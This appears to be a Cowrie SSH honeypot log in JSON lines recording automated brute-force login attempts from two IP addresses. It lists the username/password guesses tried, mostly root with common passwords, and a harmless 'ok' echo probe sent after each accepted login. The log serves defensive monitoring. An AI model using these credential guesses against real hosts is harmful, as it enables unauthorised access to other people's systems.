{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.782176Z","src_ip":"212.227.125.160","session":"6971661effce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.806025Z","src_ip":"212.227.125.160","session":"6971661effce"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.807180Z","src_ip":"212.227.125.160","session":"6971661effce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36858,"dst_ip":"1.2.3.4","dst_port":22,"session":"617677713663","protocol":"ssh","message":"New connection: 212.227.125.160:36858 (1.2.3.4:22) [session: 617677713663]","sensor":"my-vps","timestamp":"2025-08-26T20:16:16.950643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:16.951556Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:16.974423Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.login.success","username":"root","password":"sunday","message":"login attempt [root/sunday] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.087186Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:17.173869Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.174534Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.200493Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.201632Z","src_ip":"212.227.125.160","session":"617677713663"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36864,"dst_ip":"1.2.3.4","dst_port":22,"session":"43c2813a02fd","protocol":"ssh","message":"New connection: 212.227.125.160:36864 (1.2.3.4:22) [session: 43c2813a02fd]","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.222158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.233348Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.244835Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.login.success","username":"root","password":"sanchez1","message":"login attempt [root/sanchez1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.342243Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:17.456146Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.456835Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.480300Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:17.481343Z","src_ip":"212.227.125.160","session":"43c2813a02fd"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50552,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e5f04340d0a","protocol":"ssh","message":"New connection: 217.154.1.158:50552 (1.2.3.4:22) [session: 5e5f04340d0a]","sensor":"my-vps","timestamp":"2025-08-26T20:16:19.852116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:19.853070Z","src_ip":"217.154.1.158","session":"5e5f04340d0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:16:19.872621Z","src_ip":"217.154.1.158","session":"5e5f04340d0a"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:16:19.915972Z","src_ip":"217.154.1.158","session":"5e5f04340d0a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:20.932424Z","src_ip":"217.154.1.158","session":"5e5f04340d0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36870,"dst_ip":"1.2.3.4","dst_port":22,"session":"71fce8513e56","protocol":"ssh","message":"New connection: 212.227.125.160:36870 (1.2.3.4:22) [session: 71fce8513e56]","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.694303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.695506Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.717729Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.login.success","username":"root","password":"mylene1","message":"login attempt [root/mylene1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.790549Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:24.896830Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.897872Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.921216Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:24.922252Z","src_ip":"212.227.125.160","session":"71fce8513e56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37752,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c16ffdc5fb5","protocol":"ssh","message":"New connection: 212.227.125.160:37752 (1.2.3.4:22) [session: 3c16ffdc5fb5]","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.022724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.023802Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.046113Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.login.success","username":"root","password":"mounira","message":"login attempt [root/mounira] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.118581Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:28.181152Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.182041Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.207753Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:28.208831Z","src_ip":"212.227.125.160","session":"3c16ffdc5fb5"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55192,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6025c5e1fff","protocol":"ssh","message":"New connection: 217.154.1.158:55192 (1.2.3.4:22) [session: b6025c5e1fff]","sensor":"my-vps","timestamp":"2025-08-26T20:16:37.250080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:37.251082Z","src_ip":"217.154.1.158","session":"b6025c5e1fff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:16:37.279247Z","src_ip":"217.154.1.158","session":"b6025c5e1fff"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T20:16:37.323266Z","src_ip":"217.154.1.158","session":"b6025c5e1fff"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:38.339661Z","src_ip":"217.154.1.158","session":"b6025c5e1fff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53572,"dst_ip":"1.2.3.4","dst_port":22,"session":"be2a988af66a","protocol":"ssh","message":"New connection: 212.227.125.160:53572 (1.2.3.4:22) [session: be2a988af66a]","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.303320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.304031Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.326675Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.login.success","username":"root","password":"madeline","message":"login attempt [root/madeline] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.398106Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:45.514911Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.515569Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.545037Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:45.546395Z","src_ip":"212.227.125.160","session":"be2a988af66a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53578,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9bb9063aa4a","protocol":"ssh","message":"New connection: 212.227.125.160:53578 (1.2.3.4:22) [session: d9bb9063aa4a]","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.654312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.655244Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.677747Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.login.success","username":"root","password":"lakers1","message":"login attempt [root/lakers1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.787441Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:49.895061Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.895883Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.919129Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:49.920434Z","src_ip":"212.227.125.160","session":"d9bb9063aa4a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52512,"dst_ip":"1.2.3.4","dst_port":22,"session":"68c5b1779c79","protocol":"ssh","message":"New connection: 217.154.1.158:52512 (1.2.3.4:22) [session: 68c5b1779c79]","sensor":"my-vps","timestamp":"2025-08-26T20:16:54.785624Z"}
